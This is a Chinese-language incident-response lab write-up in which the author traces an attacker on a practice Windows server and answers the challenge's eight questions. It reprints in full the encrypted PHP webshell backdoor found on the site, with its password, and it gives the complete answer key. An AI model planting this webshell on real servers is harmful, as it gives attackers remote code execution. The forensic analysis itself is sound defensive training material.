载入靶机,看到相关描述:
进入虚拟机发现桌面有phpstudy和解题两个软件:
先点击“解题.exe”:
1.攻击者的IP地址(两个)?
2.攻击者的webshell文件名?
3.攻击者的webshell密码?
4.攻击者的QQ号?
5.攻击者的服务器伪IP地址?
6.攻击者的服务器端口?
7.攻击者是如何入侵的(选择题)?
8.攻击者的隐藏用户名?
还是先将蓝队应急响应工具箱”粘贴到winserver 2022中:
打开phpstudy找到web目录:
用“D盾”找到后门:
得知webshell文件名是:system.php,第二问解决
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$pass='hack6618';
$payloadName='payload';
$key='7813d1590d28a7dd';
if (isset($_POST[$pass])){
$data=encode(base64_decode($_POST[$pass]),$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
if (strpos($payload,"getBasicsInfo")===false){
$payload=encode($payload,$key);
}
eval($payload);
echo substr(md5($pass.$key),0,16);
echo base64_encode(encode(@run($data),$key));
echo substr(md5($pass.$key),16);
}else{
if (strpos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}
得知webshell密码是hack6618,要是看不懂可以让AI分析一下,第三问解决
查看Apache的日志文件:
得到攻击者IP地址:192.168.126.135,但还有一个IP地址没有发现
使用”Windows日志一键分析“:
2024-02-29 13:28:48 hack887$ WIN-RRCVI68HLRI 10 User32 WIN-RRCVI68HLRI C:\Windows\System32\svchost.exe 192.168.126.129 0 4624
得到攻击者隐藏用户名:hack887和另一个IP地址:192.168.126.129,第一问和第八问解决
QQ号通常和“Tencent Files”文件夹有关,上传everything,检索关键词“Tencent”:
找到QQ号:777888999321,第四问解决
在“FileRecv”文件夹(是接收文件的文件夹)内发现frp内网穿透工具:
在frpc,ini的配置文件中发现伪IP和端口:
伪IP:256.256.66.88,第五问解决
端口:65536,第六问解决
只剩下第七问(选择题)没有做了
1、192.168.126.135和192.168.126.129
2、system.php
3、hack6618
4、777888999321
5、256.256.66.88
6、65536
8、hack887
查看ftp服务日志内容:
可以看到system.php后门文件的上传记录,第七问答案:3,第七问解决
1、192.168.126.135和192.168.126.129
2、system.php
3、hack6618
4、777888999321
5、256.256.66.88
6、65536
7、3
8、hack887
(话说,为什么“解题.exe”没有让我回答webshell密码?)
成功攻克该靶机!